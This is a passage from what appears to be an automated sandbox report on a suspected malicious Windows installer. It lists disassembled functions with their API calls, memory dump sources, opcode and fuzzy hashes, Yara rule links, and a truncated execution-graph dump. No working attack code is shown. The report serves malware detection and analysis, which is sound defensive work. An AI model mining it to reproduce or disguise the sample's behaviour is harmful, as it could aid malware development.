                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                            Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                            Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                            Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                            Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                            Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                            Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                            Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                            Signature Coverage:3.4%
                                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                                            execution_graph 102425 c1f4c0 102428 c2a025 102425->102428 102427 c1f4cc 102429 c2a046 102428->102429 102434 c2a0a3 102428->102434 102429->102434 102437 c20340 102429->102437 102432 c6806b 102432->102432 102433 c2a0e7 102433->102427 102434->102433 102464 c83fe1 81 API calls __wsopen_s 102434->102464 102435 c2a077 102435->102433 102435->102434 102460 c1bed9 102435->102460 102446 c20376 messages 102437->102446 102438 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102438->102446 102439 c6632b 102531 c83fe1 81 API calls __wsopen_s 102439->102531 102441 c21695 102448 c1bed9 8 API calls 102441->102448 102454 c2049d messages 102441->102454 102442 c3014b 8 API calls 102442->102446 102444 c6625a 102530 c83fe1 81 API calls __wsopen_s 102444->102530 102445 c20aae messages 102529 c83fe1 81 API calls __wsopen_s 102445->102529 102446->102438 102446->102439 102446->102441 102446->102442 102446->102444 102446->102445 102447 c65cdb 102446->102447 102451 c1bed9 8 API calls 102446->102451 102446->102454 102455 c305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102446->102455 102456 c1bf73 8 API calls 102446->102456 102457 c30413 29 API calls pre_c_initialization 102446->102457 102458 c66115 102446->102458 102465 c21990 102446->102465 102527 c21e50 40 API calls messages 102446->102527 102453 c1bed9 8 API calls 102447->102453 102447->102454 102448->102454 102451->102446 102453->102454 102454->102435 102455->102446 102456->102446 102457->102446 102528 c83fe1 81 API calls __wsopen_s 102458->102528 102461 c1befc __fread_nolock 102460->102461 102462 c1beed 102460->102462 102461->102434 102462->102461 102463 c3017b 8 API calls 102462->102463 102463->102461 102464->102432 102466 c219b6 102465->102466 102467 c21a2e 102465->102467 102469 c219c3 102466->102469 102477 c66b60 102466->102477 102468 c66a4d 102467->102468 102483 c21a3d 102467->102483 102471 c66b54 102468->102471 102472 c66a58 102468->102472 102478 c66b84 102469->102478 102479 c219cd 102469->102479 102537 c83fe1 81 API calls __wsopen_s 102471->102537 102536 c2b35c 207 API calls 102472->102536 102473 c20340 207 API calls 102473->102483 102476 c66bb5 102480 c66be2 102476->102480 102481 c66bc0 102476->102481 102538 c985db 207 API calls 2 library calls 102477->102538 102478->102476 102482 c66b9c 102478->102482 102488 c1bed9 8 API calls 102479->102488 102526 c219e0 messages 102479->102526 102541 c960e6 102480->102541 102540 c985db 207 API calls 2 library calls 102481->102540 102539 c83fe1 81 API calls __wsopen_s 102482->102539 102483->102473 102484 c66979 102483->102484 102487 c21bb5 102483->102487 102490 c66908 102483->102490 102502 c21ba9 102483->102502 102510 c21af4 102483->102510 102483->102526 102535 c83fe1 81 API calls __wsopen_s 102484->102535 102487->102446 102488->102526 102534 c83fe1 81 API calls __wsopen_s 102490->102534 102491 c66dd9 102497 c66e0f 102491->102497 102644 c981ce 65 API calls 102491->102644 102495 c66c81 102614 c81ad8 8 API calls 102495->102614 102500 c1b4c8 8 API calls 102497->102500 102498 c66db7 102617 c18ec0 102498->102617 102524 c21a23 messages 102500->102524 102501 c1bed9 8 API calls 102501->102526 102502->102487 102533 c83fe1 81 API calls __wsopen_s 102502->102533 102504 c66ded 102507 c18ec0 52 API calls 102504->102507 102506 c66c08 102548 c8148b 102506->102548 102521 c66df5 _wcslen 102507->102521 102509 c66c93 102615 c1bd07 8 API calls 102509->102615 102510->102502 102532 c21ca0 8 API calls 102510->102532 102514 c21b55 102514->102502 102522 c21b62 messages 102514->102522 102515 c6691d messages 102515->102484 102515->102522 102515->102524 102516 c66dbf _wcslen 102516->102491 102640 c1b4c8 102516->102640 102518 c66c9c 102525 c8148b 8 API calls 102518->102525 102521->102497 102523 c1b4c8 8 API calls 102521->102523 102522->102501 102522->102524 102522->102526 102523->102497 102524->102446 102525->102526 102526->102491 102526->102524 102616 c9808f 53 API calls __wsopen_s 102526->102616 102527->102446 102528->102445 102529->102454 102530->102454 102531->102454 102532->102514 102533->102524 102534->102515 102535->102526 102536->102522 102537->102477 102538->102526 102539->102524 102540->102526 102542 c96101 102541->102542 102547 c66bed 102541->102547 102645 c3017b 102542->102645 102545 c96123 102545->102547 102654 c3014b 102545->102654 102663 c81400 8 API calls 102545->102663 102547->102495 102547->102506 102549 c81499 102548->102549 102550 c66c32 102548->102550 102549->102550 102551 c3014b 8 API calls 102549->102551 102552 c22b20 102550->102552 102551->102550 102553 c22b61 102552->102553 102554 c22fc0 102553->102554 102555 c22b86 102553->102555 102892 c305b2 5 API calls __Init_thread_wait 102554->102892 102557 c22ba0 102555->102557 102558 c67bd8 102555->102558 102670 c23160 102557->102670 102855 c97af9 102558->102855 102561 c22fca 102575 c2300b 102561->102575 102893 c1b329 102561->102893 102563 c67be4 102563->102526 102564 c23160 9 API calls 102566 c22bc6 102564->102566 102567 c22bfc 102566->102567 102566->102575 102569 c67bfd 102567->102569 102593 c22c18 __fread_nolock 102567->102593 102568 c67bed 102568->102526 102902 c83fe1 81 API calls __wsopen_s 102569->102902 102570 c1b4c8 8 API calls 102572 c23049 102570->102572 102900 c2e6e8 207 API calls 102572->102900 102573 c22fe4 102899 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102573->102899 102575->102568 102575->102570 102576 c67c15 102903 c83fe1 81 API calls __wsopen_s 102576->102903 102578 c22d3f 102580 c67c78 102578->102580 102581 c22d4c 102578->102581 102905 c961a2 53 API calls _wcslen 102580->102905 102582 c23160 9 API calls 102581->102582 102584 c22d59 102582->102584 102590 c23160 9 API calls 102584->102590 102600 c22dd7 messages 102584->102600 102585 c3014b 8 API calls 102585->102593 102586 c3017b 8 API calls 102586->102593 102587 c23082 102901 c2fe39 8 API calls 102587->102901 102589 c22f2d 102589->102526 102595 c22d73 102590->102595 102592 c20340 207 API calls 102592->102593 102593->102572 102593->102576 102593->102578 102593->102585 102593->102586 102593->102592 102596 c67c59 102593->102596 102593->102600 102595->102600 102601 c1bed9 8 API calls 102595->102601 102904 c83fe1 81 API calls __wsopen_s 102596->102904 102597 c23160 9 API calls 102597->102600 102598 c22e8b messages 102598->102589 102891 c2e322 8 API calls messages 102598->102891 102600->102587 102600->102597 102600->102598 102680 c9a5b2 102600->102680 102686 c8f94a 102600->102686 102695 c9ad47 102600->102695 102700 c2ac3e 102600->102700 102719 c99fe8 102600->102719 102722 c8664c 102600->102722 102729 c9a6aa 102600->102729 102737 c91858 102600->102737 102744 c9a9ac 102600->102744 102752 c99ffc 102600->102752 102755 c18bda 102600->102755 102830 c90fb8 102600->102830 102906 c83fe1 81 API calls __wsopen_s 102600->102906 102601->102600 102614->102509 102615->102518 102616->102498 102618 c18ed5 102617->102618 102634 c18ed2 102617->102634 102619 c18f0b 102618->102619 102620 c18edd 102618->102620 102623 c18f1d 102619->102623 102630 c56a38 102619->102630 102631 c56b1f 102619->102631 103446 c35536 26 API calls 102620->103446 103447 c2fe6f 51 API calls 102623->103447 102624 c18eed 102627 c3014b 8 API calls 102624->102627 102625 c56b37 102625->102625 102629 c18ef7 102627->102629 102632 c1b329 8 API calls 102629->102632 102633 c3017b 8 API calls 102630->102633 102639 c56ab1 102630->102639 103449 c354f3 26 API calls 102631->103449 102632->102634 102635 c56a81 102633->102635 102634->102516 102636 c3014b 8 API calls 102635->102636 102637 c56aa8 102636->102637 102638 c1b329 8 API calls 102637->102638 102638->102639 103448 c2fe6f 51 API calls 102639->103448 102641 c1b4d6 102640->102641 102642 c1b4dc 102640->102642 102641->102642 102643 c1bed9 8 API calls 102641->102643 102642->102491 102643->102642 102644->102504 102646 c3014b ___std_exception_copy 102645->102646 102647 c3016a 102646->102647 102650 c3016c 102646->102650 102664 c3521d 7 API calls 2 library calls 102646->102664 102647->102545 102649 c309dd 102666 c33614 RaiseException 102649->102666 102650->102649 102665 c33614 RaiseException 102650->102665 102653 c309fa 102653->102545 102655 c30150 ___std_exception_copy 102654->102655 102656 c3016a 102655->102656 